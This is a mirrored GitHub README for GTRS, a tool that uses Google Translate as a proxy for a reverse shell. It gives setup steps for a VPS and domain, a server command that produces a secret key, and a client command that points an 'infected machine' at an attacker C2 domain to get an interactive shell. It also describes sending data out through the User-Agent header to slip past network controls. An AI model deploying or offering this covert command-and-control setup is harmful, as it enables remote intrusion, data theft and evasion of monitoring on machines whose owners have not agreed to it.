42
GitHub - mthbernardes/GTRS: GTRS - Google Translator Reverse Shell
source link: https://github.com/mthbernardes/GTRS
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
GTRS - Google Translator Reverse Shell
This tools uses Google Translator as a proxy to send arbitrary commands to an infected machine.
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
Environment Configuration
First you need a VPS and a domain, for the domain you can get a free one on Freenom.
Usage
Start the server.py on your VPS
python2.7 server.py Server running on port: 80 Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
It will provide you secret key which will be used on the client.sh, run the client on a computer with access to Google Translator, providing domain and the secret key generated by the server.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Now you have an interactive shell using named pipe files, YES you can cd into directories.
Poc
Known issues
- Google translate does not forward POST data, so there's a limit on the amount of data that your server can receive, for example, you'll probably not being able to read a big file like
.bashrc.Problem fixed using User-Agent header to sent data. - It's not a problem, but I just don't know if there's a rate limit on Google Translator
- The client script works on Mac an Linux, but on Linux you need to install the
xmllintwhich is onlibxml2-utils
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK